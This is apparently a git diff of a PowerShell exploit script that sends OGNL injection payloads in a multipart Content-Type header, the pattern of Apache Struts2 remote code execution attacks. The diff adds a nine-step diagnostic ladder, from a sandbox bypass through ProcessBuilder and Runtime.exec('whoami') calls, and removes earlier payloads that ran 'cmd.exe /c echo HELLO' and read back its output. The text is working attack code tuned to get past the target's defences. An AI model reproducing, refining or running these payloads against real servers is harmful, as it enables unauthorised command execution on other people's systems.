@@ -157,22 +157,28 @@ $writeSuffix =
157157if ($DiagLevel -gt 0 ) {
158158 # -- DIAGNOSTIC MODE: incremental payloads to find exact failure step --
159159 $diagLabel = switch ($DiagLevel ) {
160- 1 { " sandbox bypass only (same as demo)"
161- 2 { " call Runtime.getRuntime()"
162- 3 { " exec process (echo HELLO)"
163- 4 { " exec + waitFor (exit code)"
164- 5 { " exec + waitFor + readAllBytes"
165- 6 { " exec + waitFor + readAllBytes + new String"
160+ 1 { " sandbox bypass only"
161+ 2 { " Runtime.getRuntime() + freeMemory()"
162+ 3 { " new StringBuilder - test new for java.lang"
163+ 4 { " new ProcessBuilder({'whoami'}) - NO start"
164+ 5 { " PB.command() - verify PB internals"
165+ 6 { " PB.start() - the actual process creation"
166+ 7 { " rt.exec('whoami') - separate var, not chained"
167+ 8 { " getRuntime().exec('whoami') - chained form"
168+ 9 { " new File('.').getAbsolutePath() - another java.io class"
166169 }
167170 Write-Host " [STEP 2] DIAGNOSTIC level $DiagLevel - $diagLabel " - ForegroundColor Magenta
168171
169172 $diagBody = switch ($DiagLevel ) {
170173 1 { " .(#proof='DIAG1: sandbox_bypass=OK')"
171- 2 { " .(#rt=@java.lang.Runtime@getRuntime()).(#proof='DIAG2: Runtime=' + #rt.toString())"
172- 3 { " .(#process=@java.lang.Runtime@getRuntime().exec('cmd.exe /c echo HELLO')).(#proof='DIAG3: exec_OK, process=' + #process.toString())"
173- 4 { " .(#process=@java.lang.Runtime@getRuntime().exec('cmd.exe /c echo HELLO')).(#exitCode=#process.waitFor()).(#proof='DIAG4: exitCode=' + #exitCode)"
174- 5 { " .(#process=@java.lang.Runtime@getRuntime().exec('cmd.exe /c echo HELLO')).(#process.waitFor()).(#data=#process.getInputStream().readAllBytes()).(#proof='DIAG5: readAllBytes.length=' + #data.length)"
175- 6 { " .(#process=@java.lang.Runtime@getRuntime().exec('cmd.exe /c echo HELLO')).(#process.waitFor()).(#data=#process.getInputStream().readAllBytes()).(#out=new java.lang.String(#data,'UTF-8')).(#proof='DIAG6: output=[' + #out + ']')"
174+ 2 { " .(#rt=@java.lang.Runtime@getRuntime()).(#mem=#rt.freeMemory()).(#proof='DIAG2: mem=' + #mem)"
175+ 3 { " .(#sb=new java.lang.StringBuilder('test')).(#proof='DIAG3: StringBuilder=' + #sb.toString())"
176+ 4 { " .(#p=new java.lang.ProcessBuilder({'whoami'})).(#proof='DIAG4: PB=' + #p.toString())"
177+ 5 { " .(#p=new java.lang.ProcessBuilder({'whoami'})).(#cmd=#p.command()).(#proof='DIAG5: command=' + #cmd.toString())"
178+ 6 { " .(#p=new java.lang.ProcessBuilder({'whoami'})).(#p.redirectErrorStream(true)).(#process=#p.start()).(#proof='DIAG6: process=' + #process.toString())"
179+ 7 { " .(#rt=@java.lang.Runtime@getRuntime()).(#process=#rt.exec('whoami')).(#proof='DIAG7: process=' + #process.toString())"
180+ 8 { " .(#process=@java.lang.Runtime@getRuntime().exec('whoami')).(#proof='DIAG8: process=' + #process.toString())"
181+ 9 { " .(#f=new java.io.File('.')).(#proof='DIAG9: cwd=' + #f.getAbsolutePath())"
176182 }
177183
178184 $contentType = " .%{" + $bypassPrefix + $diagBody + " ." + $writeSuffix + " }.multipart/form-data"
0 commit comments